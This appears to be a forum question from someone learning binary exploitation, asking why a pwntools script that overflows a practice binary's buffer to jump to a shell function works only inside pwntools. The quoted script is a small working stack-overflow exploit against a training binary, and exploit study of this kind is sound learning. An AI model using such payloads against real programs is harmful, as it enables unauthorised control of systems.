12Şub
Why does this payload only work within pwntools?
I'm trying to learn binary exploitation. I started with the following:
https://github.com/tripoloski1337/learn-to-pwn/tree/master/overwrite_instruction_pointer
After a bit of experimentation, I arrived at the following pwntools script:
from pwn import *
context(arch='i386', os='linux')
shell_address = 0x8049229
padding = b'A' * 138
payload = padding + p32(shell_address)
# with open('payload.bin', 'wb') as f: f.write(payload)
program = process(['./ip'])
program.sendline(payload)
program.interactive()
This works, but if I use payload.bin by doing ./ip < payload.bin, it crashes with a segfault at 0x0 instead. The same behavior happens if I comment out the "context" line. What am I doing wrong?
